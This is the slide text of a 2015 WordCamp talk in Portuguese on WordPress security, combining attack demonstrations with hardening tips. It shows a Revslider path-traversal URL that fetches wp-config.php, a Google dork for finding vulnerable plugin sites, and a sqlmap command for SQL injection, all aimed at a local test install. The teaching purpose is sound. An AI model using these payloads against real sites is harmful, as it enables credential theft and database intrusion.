Evento: WordCamp Belo Horizonte 2015 Data: 13/06/2015 Desenvolvimento para WordPress deve sempre levar em conta segurança e padrões de programação. Seja um Hackers implementando regras e dicas de segurança para manter seu WordPress seguro.

1. WordPress Vs Hackers
A Rebelião das Máquinas

2. Quem somos
Thiago Lenon

3. O “Canive Suiço”
=

4. Diversas facetas

5. Hackers vs WordPress

6. Momento “Reflexão”
“O problema com os programadores é que você
nunca consegue saber o que eles estão fazendo
antes de ser tarde demais.”
Seymour Cray
“Quanto maior facilidade, maior a
probabilidade para o desenvolvedor fazer
cagada.”
Pensador desconhecido

7. Cruel realidade
Fonte https://wappalyzer.com/categories/cms (01/06/2015)
CMS mais utilizados

8. Cruel realidade
Vulnerabilidades por Ano
Fonte http://www.cvedetails.com/vendor/2337/Wordpress.html: (01/06/2015)

9. Cruel realidade
Fonte http://www.cvedetails.com/vendor/2337/Wordpress.html: (01/06/2015)
Tipos de Vulnerabilidades

10. Em qualquer lugar a qualquer hora
http://www.aszone.com.br/2015/06/list-of-potentially-affected-themes-wordpress/

11. Hackers vs WordPress

12. Local File Download
Exploit Revslider em ação.
LFD = Local File Download, explicar o que é, o que acontece no código.
● http://wordpress.local/wp-admin/admin-ajax.php?
action=revslider_show_image&img=/uploads/2015/06/wordpress-
camp.jpg
● http://wordpress.local/wp-admin/admin-ajax.php?
action=revslider_show_image&img=../wp-config.php

13. Local File Download
Onde está o PROBLEMA ?

14. Local File Download

15. Local File Download

16. Sql Injection

17. Sql Injection
!passo
Dork:
inurl:season=*league_id=*matchday
https://google.com/search?q=inurl%3Aseason%3D*league_id%3D*match_day

18. Sql Injection
python sqlmap.py -u "http://localhost/wordpress/?
season=1&league_id=1&match_day=1&team_id=1" --dbs

19. Sql Injection

20. Sql Injection
Onde está o PROBLEMA ?

21. Sql Injection

22. Hackers vs WordPress

23. Dicas para sobrevivência
Durante desenvolvimento
● Siga os padrões de criação de temas e plugins do WordPress;
● Implemente testes unitários;
● Pratique "Par Programming";
● Pratique "Code Review";
● Pentest em ciclos evolutivos;
● Metodologia de desenvolvimento seguro;

24. Dicas para sobrevivência
WordPress
● Alteração do nome do usuário “admin” e senhas HARDCORE;
● Não instalar vários plugins de segurança;
● Antes de instalar pesquise sobre os plugins e temas;
● Modo Debug false;
● Manter o core, temas e plugins atualizados;
● Desabilitar a função de edição dos temas e plugins;
● Bloquear Brute force e visualização de pastas;
● Utilizar robots.txt ;
● Usar as constantes no wp-config:
WP_CONTENT_DIR, WP_PLUGIN_DIR, UPLOADS,
WP_AUTO_UPDATE_CORE, WP_HTTP_BLOCK_EXTERNAL

25. Dicas para sobrevivência
Infraestrutura e Segurança
● Prepração de infra;
● Uso de ferramentas de vulnerabilidades;
○ Use WpScan;
○ Use Accunetix;
○ Use Metaexploit;
● Alterar e bloquear o wp-admin/;
● Criar subdomínio para ambiente administrativo;

26. Obrigado !!!
@thiagodieb
@lenonleite
http://www.aszone.com.br